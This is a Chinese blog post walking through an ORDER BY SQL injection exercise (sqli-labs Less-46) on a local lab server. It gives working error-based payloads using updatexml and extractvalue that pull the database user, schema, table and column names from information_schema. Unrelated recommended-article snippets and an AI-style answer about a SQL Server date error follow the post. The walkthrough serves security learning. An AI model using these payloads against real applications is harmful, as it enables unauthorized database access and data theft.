sql-lib之order by 注入

最新推荐文章于 2025-07-21 21:03:17 发布
最新推荐文章于 2025-07-21 21:03:17 发布
阅读量2k 收藏 4
点赞数 1
CC 4.0 BY-SA版权
分类专栏: sql 文章标签: order by sql 注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_43803070/article/details/89928281
本文介绍了判断order by之后是否存在注入的方法,即通过在参数后加asc或desc观察顺序是否改变。还阐述了正式注入的过程,包括判断order by后参数的影响,构造三种形式的playload,因回显信息有限需使用盲注,最后介绍了找关键数据库、表和列的注入方法。

前言:

如何判断是否存在order by之后的注入?
在参数后面加个asc(结果升序显示)、desc(结果降序显示)来观察其顺序是否改变就行了。顺序改变了,所以存在注入。
在这里插入图片描述在这里插入图片描述接下来我们进行正式注入:
一、
首先我们判断order by后面接的参数有没有影响,尝试注入:left(version(),1)和right(version(),1),发现结果没影响,说明后面参数随意。这里我们解释一下这两个函数:
1)
left()函数是一个字符串函数,它返回具有指定长度的字符串的左边部分。
left(str,length);
left()函数接受两个参数:
str是要提取子字符串的字符串。
length是一个正整数,指定将从左边返回的字符数。
2)
right函数与left一样在这里就不多说了。
3)构造playload有三种形式:
① 直接在sort的参数里注入,如:sort=(select username from users limit 0,1)–+,此时将会显示当前表的内容
这里要注意不论我们注入任何查询,结果能显示的基本都是有限的,我们无法查询到我们查询的信息,例如这里我们注入:sort=(select group_concat(email_id) from emails)–+,结果依旧是只能看当前表的内容。
所以这里就是相当于一种只有通过盲注才能获取到信息的状态,于是对于这种order by后的注入我们一般使用盲注,这里我们使用报错注入(当然其他盲注也都可以尝试):sort= (updatexml (1, concat (0x7e,(select database()),0x7e),1))–+
② 使用一些函数,如rand()等,例如:sort=rand(updatexml(1,concat(0x7e,(select database()),0x7e),1))–+,结果一样,就不赘述了。
③ 在后面加and,再加入其他语句,例如:sort=1 and updatexml (1,concat (0x7e, (select database()),0x7e),1)–+,结果也一样。
--------------------- !
二、
参数没有影响之后,我们进行注入
1)直接在sort的参数里注入:
http://127.0.0.1/sqli-labs-master/Less-46/?sort=(select username from users )--+
在注入的时候我们出现了这种情况,我们发现回显的信息是有限制的。也就是说我们在查询其他信息的时候可能查询不到。
在这里插入图片描述
我们换用一下方式:
http://127.0.0.1/sqli-labs-master/Less-46/?sort=(select username from users limit 0,1)--+
在这里插入图片描述因为我们有些信息是不能查到的,显示的信息有限。所以在这里我们需要应用盲注,比如报错注入、延时注入、等等。

http://127.0.0.1/sqli-labs-master/Less-46/?sort=(extractvalue(1,concat(0x3a,(select user()),0x3a)))–+

在这里插入图片描述二、
找关键数据库,由于回显示的信息不能太多所以我们只能运用limit
http://127.0.0.1/sqli-labs-master/Less-46/?sort=(extractvalue(1,concat(0x3a,(select schema_name from information_schema.schemata limit 1,1),0x3a)))–+
在这里插入图片描述找关键的表
http://127.0.0.1/sqli-labs-master/Less-46/?sort=(extractvalue(1,concat(0x3a,(select table_name from information_schema.tables limit 1,1),0x3a)))–+
在这里插入图片描述找关键的列
http://127.0.0.1/sqli-labs-master/Less-46/?sort=(extractvalue(1,concat(0x3a,(select column_name from information_schema.columns limit 1,1),0x3a)))–+
在这里插入图片描述至此,注入结束。

SQL注入order by注入
qq_68163788的博客
01-30 3095
Order by注入是一种SQL注入攻击的类型,它利用了在SQL查询中使用order by子句来对结果进行排序的漏洞。在正常情况下,order by子句会根据指定的列对结果进行排序,但是如果应用程序没有对用户提供的输入进行正确的验证和过滤,攻击者就可以利用这个漏洞来执行恶意的SQL查询。 通过在order by子句中插入恶意的SQL代码,攻击者可以获取敏感数据、修改数据库内容或者执行其他恶意操作。例如,攻击者可以利用order by注入来发现数据库中的表名、列名或者获取敏感数据。
SQL注入进阶-order by注入
AkangBoy的博客
11-06 9844
本文从order by原理简介开始,详细描述了order by注入原理以及多种注入姿势,包含order by union select注入order by if()注入order by sleep()注入order by报错注入
SQL注入ORDER BY注入
m0_74834253的博客
02-22 4528
使用ORDER BY语句不仅支持对单列数据的排序,还支持对数据表中多列数据的排序。需要注意的是这样注入的效率很低,还是应该先考虑其他的注入方式最后在采用时间盲注。order by还支持多个字段自定义排序,通过逗号隔开,但只能在数字之间进行自定义排序,若选择字符类型则会根据第一个列名的排序规则进行排序。为true或者false时,排序结果是不同的,但因为序列相同所以就可以使用rand()函数进行盲注了。
sqli-labs靶场通关笔记:第46-53关 order by注入
最新发布
CL1799438883的博客
07-21 417
和上关的区别是使用了单引号包裹,要注意的是,这会导致 SQL 语句将$id当作一个字符串常量来处理,而不是列名或排序索引。由于字符串常量没有实际的排序意义,MySQL 会忽略这个排序条件,通常会按照表中数据的默认顺序返回结果,也就是插入数据时的顺序或者存储引擎决定的物理顺序。因为MySQL 优化了常量表达式:当 IF 的两个分支都是常量时,MySQL 可能认为无论条件如何,排序规则都不变,因此忽略条件判断。当sort=1时是根据第一列的字段id来排序,sort=2时根据username字段排序。
sql注入中的order by
热门推荐
渗透之路,攻防之间皆学问
03-14 1万+
sql 注入时可以使用 order by n 来判断当前表中的字段个数。
Mysql Order By 注入总结
vspiders的博客
10-22 2581
前言 最近在做一些漏洞盒子后台项目的总结,在盒子多期众测项目中,发现注入类的漏洞占比较大。其中Order By注入型的漏洞也占挺大一部分比例,这类漏洞也是白帽子乐意提交的类型(奖金高、被过滤概率小)。今天给大家分享下一些关于Order By的有趣的经验。 何为order by 注入 本文讨论的内容指可控制的位置在order by子句后,如下order参数可控:select * f
sql注入 sql-lib第一个(回显注入
weixin_74182283的博客
03-28 1655
SQL注入攻击的根源:程序命令和用户数据(即用户输入) 之间没有做到泾渭分明 注入成功的基础 1、相信用户输入的数据 2、Sql语句的拼接按照注入的网页功能类型分类 •(ps:注入类型纯看个人收集情况)1、登录注入 • 2、cms注入 •按照注入点值的属性分类 • 1、数值型 • 2、字符串型 •基于从服务器返回的内容 • 1、有回显 • 2、无回显 •按照注入的程度和顺序 • 1、一阶注入 • 2、二阶注入 •。
SQL注入实操】sql-lib1-8道题
m0_73629042的博客
03-20 1353
这里发现一个很有意思的东西,当我输入中文的单引号,再加上#时,回显正常(这里有点疑惑,不会识别中文字符,而且#注释的是后面的语句。1’是我们输入的内容,目的是为了闭合前面的‘号,后面剩下'),其中)的出现肯定是因为先前的语句中有(,所以我们需要将它闭合,然后直接将后面的')注释。id=1'#,回显正常即可,但是这里#貌似不起作用,可能是数据库对#和--要求不同,我们也可以先将后面的'闭合,再闭合前面的( 还是需要注释后面的,事实上不注释也可以)数字不报错,单引号报错,双引号不报错,所以是单引号注入漏洞。
sql-lib 闯关课程第一课
tmgt的博客
04-25 3126
sql-libs是github上的一个专注于sql注入的平台,目前网上关于这个平台的资源很多,我的这个系列主要是分享与总结我得心得,下面开始吧 sql-libs下载地址 链接: sql-libs下载地址. less1 我采用的环境是phpstudy集成环境,网上的教程很多,可以自行寻找搭建。我搭建的环境是php5.2.17+Apache2.4.39+Mysql8.0环境,在php5.2环境中mag...
Sql-labs 靶场搭建及通关
m0_74825074的博客
01-21 1304
该语句的意思是查询information_schema数据库下的tables表里面且table_schema字段内容是security的所有table_name的内容。该语句的意思是查询information_schema数据库下的columns表里面且table_users字段内容是users的所有column_name的内。爆出库是 ctfshow,ctftraining,information_schema,mysql,performance_schema,security,test。
SQL注入——sqli-labs(Less-1
E-Malon的博客
05-29 457
一边查看源码,一边多方学习别人的 WriteUp,在此过程中补充基础知识,最终落到实验操作。慢慢来,比较快。欢迎大咖指导,欢迎各位网友交流经验。
sql注入order by注入
qq_45627785的博客
08-05 7306
Jan 1, 0001 00:00 · 427 words · 3 minute readCTF 了解order by order by盲注 结合union来盲注 基于if()盲注 需要知道列名 不需要知道列名 基于时间的盲注 基于rang()的盲注 order by 报错注入 updatexml extractvalue 在安恒杯看到了利用order by进行盲注,记得自己之前好像总结过order by后的注入方法,翻..
order by 注入
硫酸超的博客
08-07 2789
order by 注入前言直接添加注入语句利用一些函数利用 andorderby stacked injection 前言 尝试?sort=1 desc 或者 asc,显示结果不同,则表明可以注入。(升序 or 降序排列) 从上述的 sql 语句中我们可以看出,我们的注入点在 order by 后面的参数中,而 order by 不同于的我们在 where 后的注入点,不能使用 union 等进行注入。 如果order by '1’显示的是默认排序 直接添加注入语句 ?sort=(select ******
sql注入--order by注入
2301_81142776的博客
02-27 1757
目标是把performance_schema的把复杂度降低,让DBA能更好的阅读这个库里的内容。sys_开头是库里的配置表,sys_config用于sys schema库的配置。information_schema是mysql自带的一个数据库,他提供了访问数据库元数据的方式。如数据库名,数据库的表,表栏的数据类型与访问权限等。通过对information_schema库的注入我们可以得到库名,表名,列名等等信息。该视图提供了表的统计信息,包括表名、数据库名等。子句,触发数据库错误,从而获取数据库信息。
mysql order by注入_sql注入order by注入
weixin_28882177的博客
01-19 5107
0x00 前言夜里看了一篇文章,突然有了启发,赶紧记录一下。了解order by参考:order by是mysql中对查询数据进行排序的方法, 使用示例select * from 表名 order by 列名(或者数字) asc;升序(默认升序)select * from 表名 order by 列名(或者数字) desc;降序这里的重点在于order by后既可以填列名或者是一个数字。举个例子:...
【ctf】sql注入——order by注入
wlllllianqing的博客
10-03 558
order by注入 这里我们先介绍一下逻辑运算符 逻辑运算符是按位进行运算的 首先将十进制转化为二进制,再进行按位运算; ORDER BY1,2,3…) 语句 ORDER BY 语句用于对结果集进行排序。 ORDER BY 语句用于根据指定的列对结果集进行排序。 ORDER BY 语句默认按照升序对记录进行排序。 在不知道列名的情况可以用序号来指代相应的列。 asc:正序输出; desc:逆序输出; select * from user order by id desc 但有一点,order by
SQL注入order by 注入:联合盲注、报错、堆叠注入
07-16 1269
SQL-order by注入
(手工)【sqli-labs40、41】堆叠注入、盲注
07-15 1884
SQL-堆叠、盲注】
Execution failed on sql 'SELECT * FROM DLCH.dbo.CH_MainDt WHERE ((YWNRId >= 1 AND YWNRId <= 41) OR (YWNRId >= 85 AND YWNRId <= 97)) AND (CreateTime <= '{end_time}')ORDER BY CreateTime': (241, b'Conversion failed when converting date and/or time from character string.DB-Lib error message 20018, severity 16:\nGeneral SQL Server error: Check messages from the SQL Server\n')
03-20
<think>嗯,用户遇到了一个SQL执行错误,我得仔细看看这个问题。首先,错误信息是“Conversion failed when converting date and/or time from character string”,这说明在日期时间转换上出了问题。用户提供的SQL语句中有一个参数{end_time},可能在执行的时候被替换成一个字符串值,但数据库无法将其正确转换为日期时间类型。 接下来,我需要检查SQL语句的结构。用户用了DLCH.dbo.CH_MainDt表,条件部分包括YWNRId的范围和CreateTime小于等于某个结束时间。问题可能出在CreateTime的比较上,特别是{end_time}的格式是否正确。比如,如果替换进去的字符串格式不符合SQL Server的要求,比如不是'YYYY-MM-DD HH:mm:ss'这样的格式,就会导致转换失败。 另外,用户使用了单引号包裹{end_time},这在SQL中是必须的,但可能输入的日期字符串里有什么特殊字符,或者格式不对。例如,月份用了MMM缩写而不是数字,或者日期部分顺序不对。还有可能时区的问题,不过一般SQL Server默认是服务器时区。 另一个可能性是字段类型不匹配。比如CreateTime是datetime或datetime2类型,但传入的字符串无法解析为对应的类型。需要确认{end_time}的实际值是什么,比如是否有正确的日期和时间部分,是否包含毫秒等。 用户提到的错误代码241和DB-Lib的错误消息,这些都是SQL Server相关的,说明问题出在客户端传递的参数值上。可能是在代码中拼接SQL的时候,没有正确格式化日期时间,或者区域设置导致格式不一致。 解决方法方面,首先要确保{end_time}的值是正确的日期时间字符串,符合SQL Server的要求。可以使用CONVERT或CAST函数显式转换,或者在代码中使用参数化查询,而不是拼接字符串,这样能避免格式问题。此外,检查数据库的日期格式设置,确保与输入的字符串一致。 可能用户的应用层代码中,end_time变量被替换时没有正确格式化,比如用了本地化的日期格式,如'DD/MM/YYYY',而SQL Server期望的是'MM/DD/YYYY'或其他格式,导致转换错误。这时候需要统一使用ISO 8601标准格式,如'YYYY-MM-DDTHH:mm:ss',或者在传入前进行验证。 总结起来,关键点在于检查{end_time}的实际值是否正确,格式是否符合数据库要求,以及是否应该使用参数化查询来避免此类问题。同时,查看SQL Server的错误日志,获取更详细的错误信息,也能帮助定位问题。</think>这个错误是 SQL Server 在执行日期时间转换时发生的类型不匹配问题。以下是分步解析和解决方案: --- ### **错误原因分析** 1. **错误代码 241** `Conversion failed when converting date and/or time from character string` 表示 SQL Server 无法将输入的字符串转换为有效的日期时间格式。 2. **关键问题位置** 错误指向 `CreateTime <= '{end_time}'` 这个条件: - `{end_time}` 替换后的字符串格式与数据库字段 `CreateTime` 的日期时间类型不兼容 - 例如:输入了 `2023-13-32`(非法日期)或 `2023/12/31`(格式不匹配) 3. **潜在陷阱** - 使用字符串拼接(如 `'{end_time}'`)而非参数化查询,易受格式和注入攻击影响 - 客户端与数据库的日期格式区域设置不一致 --- ### **逐步解决方案** #### **1. 验证日期时间格式** 确保 `{end_time}` 的值符合 **ISO 8601 标准**: $$ \text{YYYY-MM-DDTHH:mm:ss} \quad \text{(例如:2023-12-31T23:59:59)} $$ ```sql -- 测试直接替换值是否合法 SELECT * FROM DLCH.dbo.CH_MainDt WHERE ((YWNRId BETWEEN 1 AND 41) OR (YWNRId BETWEEN 85 AND 97)) AND (CreateTime <= '2023-12-31T23:59:59') ORDER BY CreateTime ``` #### **2. 使用显式类型转换** 通过 `CONVERT` 或 `CAST` 强制指定日期格式: ```sql SELECT * FROM DLCH.dbo.CH_MainDt WHERE ((YWNRId BETWEEN 1 AND 41) OR (YWNRId BETWEEN 85 AND 97)) AND (CreateTime <= CONVERT(DATETIME, '{end_time}', 120)) -- 120 对应 ISO 8601 格式 ORDER BY CreateTime ``` #### **3. 参数化查询(推荐)** 避免字符串拼接,改用参数化查询(以 Python 为例): ```python import pyodbc end_time = "2023-12-31 23:59:59" query = """ SELECT * FROM DLCH.dbo.CH_MainDt WHERE ((YWNRId BETWEEN 1 AND 41) OR (YWNRId BETWEEN 85 AND 97)) AND (CreateTime <= ?) ORDER BY CreateTime """ cursor.execute(query, (end_time,)) ``` #### **4. 检查数据库区域设置** 通过 SQL 查询服务器日期格式: ```sql SELECT @@LANGUAGE AS 'Language', DATEFORMAT AS 'DateFormat' ``` 若服务器使用 `dmy` 格式(日/月/年),而输入为 `mdy`(月/日/年),需统一格式。 --- ### **附加建议** 1. **启用 SQL 日志** 检查 SQL Server 错误日志(路径:`Management -> SQL Server Logs`)获取详细错误堆栈。 2. **测试边界值** 用硬编码日期替换 `{end_time}`,验证是代码问题还是数据问题。 3. **防御性编程** 在应用层添加日期格式校验逻辑,例如正则表达式: ```regex ^\d{4}-\d{2}-\d{2}(T\d{2}:\d{2}:\d{2})?$ ``` --- 通过以上步骤,可定位并修复日期时间转换问题。如果问题仍存在,建议提供实际的 `{end_time}` 替换值进一步分析。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值